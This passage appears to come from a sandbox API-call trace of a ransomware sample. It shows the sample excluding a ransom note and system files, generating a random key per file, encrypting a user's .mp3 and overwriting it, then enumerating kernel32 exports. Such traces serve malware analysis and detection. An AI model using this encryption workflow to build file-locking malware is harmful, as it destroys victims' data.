dwReserved0=0x0, dwReserved1=0x0, cFileName="yMux wkXlE.mp3", cAlternateFileName="YMUXWK~1.MP3")) returned 1 [0083.109] lstrcmpiW (lpString1="yMux wkXlE.mp3", lpString2="DECRYPT-FILES.txt") returned 1 [0083.109] lstrcmpiW (lpString1="yMux wkXlE.mp3", lpString2="autorun.inf") returned 1 [0083.109] lstrcmpiW (lpString1="yMux wkXlE.mp3", lpString2="boot.ini") returned 1 [0083.109] lstrcmpiW (lpString1="yMux wkXlE.mp3", lpString2="desktop.ini") returned 1 [0083.109] lstrcmpiW (lpString1="yMux wkXlE.mp3", lpString2="ntuser.dat") returned 1 [0083.109] lstrcmpiW (lpString1="yMux wkXlE.mp3", lpString2="iconcache.db") returned 1 [0083.110] lstrcmpiW (lpString1="yMux wkXlE.mp3", lpString2="bootsect.bak") returned 1 [0083.110] lstrcmpiW (lpString1="yMux wkXlE.mp3", lpString2="ntuser.dat.log") returned 1 [0083.110] lstrcmpiW (lpString1="yMux wkXlE.mp3", lpString2="thumbs.db") returned 1 [0083.110] lstrcmpiW (lpString1="yMux wkXlE.mp3", lpString2="Bootfont.bin") returned 1 [0083.110] lstrlenW (lpString="yMux wkXlE.mp3") returned 14 [0083.110] lstrcmpiW (lpString1="mp3", lpString2="lnk") returned 1 [0083.110] lstrcmpiW (lpString1="mp3", lpString2="exe") returned 1 [0083.110] lstrcmpiW (lpString1="mp3", lpString2="sys") returned -1 [0083.110] lstrcmpiW (lpString1="mp3", lpString2="dll") returned 1 [0083.110] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\") returned 65 [0083.110] lstrlenW (lpString="yMux wkXlE.mp3") returned 14 [0083.110] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\" [0083.110] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpString2="yMux wkXlE.mp3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\yMux wkXlE.mp3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\yMux wkXlE.mp3" [0083.110] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.110] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\yMux wkXlE.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\h1mimyxalwng6ys6\\ymux wkxle.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0083.110] GetFileSizeEx (in: hFile=0x448, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=42344) returned 1 [0083.110] CreateFileMappingW (hFile=0x448, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x44c [0083.110] MapViewOfFile (hFileMappingObject=0x44c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0083.111] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0083.111] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0083.111] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.111] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0083.111] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0083.112] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.112] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0083.118] CloseHandle (hObject=0x44c) returned 1 [0083.118] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.118] WriteFile (in: hFile=0x448, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0083.119] CloseHandle (hObject=0x0) returned 0 [0083.119] CloseHandle (hObject=0x448) returned 1 [0083.119] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.119] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.119] GetTickCount () returned 0x114d402 [0083.119] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.120] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.120] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.120] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.120] lstrlenA (lpString="kernel32.dll") returned 12 [0083.120] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.120] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.120] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.120] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.120] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.120] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.120] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.120] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.120] lstrlenA (lpString="ADDATOMA") returned 8 [0083.120] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.120] lstrlenA (lpString="ADDATOMW") returned 8 [0083.120] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.121] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.121] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.121] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.121] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.121] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.121] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.121] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.121] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.121] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.121] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.121] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.121] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.121] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.121] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.121] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.121] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.121] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.121] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.121] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.121] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.121] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.121] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.121] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.121] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.121] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.121] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.121] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.121] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.121] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.121] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.121] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.121] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.121] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.121] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.121] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.121] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.121] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.122] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.122] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.122] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.122] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.122] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.122] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.122] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.122] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.122] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.122] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.122] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.122] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.122] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.122] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.122] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.122] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.122] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.122] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.122] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.122] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.122] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.122] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.122] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.122] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.122] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.122] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.122] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.122] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.122] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.122] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.122] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.122] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.122] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.122] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.122] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.122] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.122] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.122] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.123] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.123] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.123] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.123] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.123] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.123] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.123] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.123] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.123] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.123] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.123] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.123] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.123] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.123] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.123] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.123] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.123] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.123] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.123] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.123] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.123] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.123] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.123] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.123] lstrlenA (lpString="BEEP") returned 4 [0083.123] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.123] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.123] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.123] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.123] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.123] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.123] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.123] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.123] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.123] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.123] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.123] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.123] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.124] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.124] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.124] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.124] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.124] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.124] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.124] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.124] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.124] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.124] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.124] lstrlenA (lpString="CANCELIO") returned 8 [0083.124] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.124] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.124] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.124] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.124] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.124] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.124] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.124] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.124] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.124] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.124] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.124] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.124] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.124] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.124] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.124] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.124] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.124] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.124] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.124] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.124] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.124] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.124] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.124] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.124] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.125] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.125] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.125] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.125] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.125] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.125] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.125] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.125] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.125] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.125] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.125] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.125] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.125] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.125] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.125] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.125] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.125] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.125] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.125] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.125] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.125] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.125] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.125] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.125] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.125] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.125] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.125] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.125] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.125] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.125] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: 